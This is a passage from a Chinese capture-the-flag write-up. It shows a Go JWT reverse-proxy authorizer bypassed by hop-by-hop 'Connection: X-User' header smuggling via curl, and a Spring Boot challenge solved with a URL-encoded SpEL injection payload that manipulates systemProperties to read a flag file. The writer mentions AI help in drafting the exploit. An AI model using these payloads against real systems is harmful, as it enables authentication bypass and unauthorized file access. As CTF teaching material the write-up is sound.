}func SignToken(uid string) (string, error) {t := jwt.NewWithClaims(jwt.SigningMethodHS256, AuthClaims{UID: uid,RegisteredClaims: jwt.RegisteredClaims{Issuer: "Authorizer",Subject: uid,ExpiresAt: jwt.NewNumericDate(time.Now().Add(time.Hour)),IssuedAt: jwt.NewNumericDate(time.Now()),NotBefore: jwt.NewNumericDate(time.Now()),},})tokenString, err := t.SignedString([]byte(SecretKey))if err != nil {return "", err}return tokenString, nil
}func GetUIDFromRequest(r *http.Request) string {authHeader := r.Header.Get("Authorization")if authHeader == "" {cookie, err := r.Cookie("token")if err == nil {authHeader = "Bearer " + cookie.Value} else {return ""}}if len(authHeader) <= 7 || !strings.HasPrefix(authHeader, "Bearer ") {return ""}tokenString := strings.TrimSpace(authHeader[7:])if tokenString == "" {return ""}token, err := jwt.ParseWithClaims(tokenString, &AuthClaims{}, func(token *jwt.Token) (interface{}, error) {if _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {return nil, fmt.Errorf("unexpected signing method: %v", token.Header["alg"])}return []byte(SecretKey), nil})if err != nil {log.Printf("failed to parse token: %v", err)return ""}claims, ok := token.Claims.(*AuthClaims)if !ok || !token.Valid {log.Printf("invalid token claims")return ""}return claims.UID
}func main() {authorizer := &httputil.ReverseProxy{Director: func(req *http.Request) {req.URL.Scheme = "http"req.URL.Host = "127.0.0.1:5000"uid := GetUIDFromRequest(req)log.Printf("Request UID: %s, URL: %s", uid, req.URL.String())req.Header.Del("Authorization")req.Header.Del("X-User")req.Header.Del("X-Forwarded-For")req.Header.Del("Cookie")if uid == "" {req.Header.Set("X-User", "anonymous")} else {req.Header.Set("X-User", uid)}}}signRouter := mux.NewRouter()signRouter.HandleFunc("/sign", func(w http.ResponseWriter, r *http.Request) {if !strings.HasPrefix(r.RemoteAddr, "127.0.0.1:") {http.Error(w, "Forbidden", http.StatusForbidden)}uid := r.URL.Query().Get("uid")token, err := SignToken(uid)if err != nil {log.Printf("Failed to sign token: %v", err)http.Error(w, "Failed to generate token", http.StatusInternalServerError)return}w.Write([]byte(token))}).Methods("GET")log.Println("Sign service is running at 127.0.0.1:4444")go func() {if err := http.ListenAndServe("127.0.0.1:4444", signRouter); err != nil {log.Fatal(err)}}()log.Println("Authorizer middleware service is running at :5555")if err := http.ListenAndServe(":5555", authorizer); err != nil {log.Fatal(err)}
}
所以杜绝了伪造jwttoken
和header
字段的可能,因为这里不管传入什么header X-User
头,程序内部都会作一个替换,并且还会检查token
是否有效。
最后使用Connection
头字段,传入X-User
作为连接专用的header
头,来进行请求走私,绕过检查,拿到flag
:
curl -H 'Connection: close, X-User' 'http://47.94.205.237:22538/dashboard'
flag{2b64dd86-8268-44b5-be04-f541b25d785a}
bbjv
题目内容:
a baby spring
bbjv_bc4ff9919583580cd2476ebd25b3f409.zip
java
代码审计,审计sprint Framework
。
使用jd-gui
反编译后,将BOOT-INF
目录下的文件内容给chat
:
将EvaluationService.class
贴进去:
但是exp
不太对,让继续跑了跑,发现可以利用#{}
占位符进行解析。
然后ai
使用到时长了,自己审计了一下。
之后审计SpelConfig.class
package BOOT-INF.classes.com.ctf.gateway.config;import com.ctf.gateway.accessor.SecurePropertyAccessor;
import java.util.Properties;
import org.springframework.beans.factory.annotation.Qualifier;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.PropertyAccessor;
import org.springframework.expression.spel.support.SimpleEvaluationContext;@Configuration
public class SpelConfig {@Bean({"systemProperties"})public Properties systemProperties() {return System.getProperties();}@Bean({"restrictedEvalContext"})public EvaluationContext restrictedEvaluationContext(@Qualifier("systemProperties") Properties systemProperties) {SimpleEvaluationContext simpleContext = SimpleEvaluationContext.forPropertyAccessors(new PropertyAccessor[] { (PropertyAccessor)new SecurePropertyAccessor() }).build();simpleContext.setVariable("systemProperties", systemProperties);return (EvaluationContext)simpleContext;}
}
发现Bean
可以通过Spel
访问System.getProperties()
,返回一些敏感信息,联合ai
:
https://eci-2zeeicuoz4eh6nylfnqg.cloudeci1.ichunqiu.com:8080/check?rule=#{systemProperties['java.home']}
发现没有正确初始化,继续拷打:
ok
了,接下来尝试读取flag
,查看题目附件中的Dokerfile
:
FROM openjdk:21-jdk-slimWORKDIR /appCOPY app.jar /app/app.jar
COPY flag.txt /tmp/flag.txtEXPOSE 8080CMD ["java", "-jar", "app.jar"]%
知道了flag
在/tmp
目录下,最后构造exp
:
https://eci-2zeeicuoz4eh6nylfnqg.cloudeci1.ichunqiu.com:8080/check?rule=%23%7B%23systemProperties%5B'user.home'%5D%20%3D%20%23systemProperties%5B'java.io.tmpdir'%5D%7D
flag{b7f891ce-cebe-469d-8ea5-12a0923cbafe}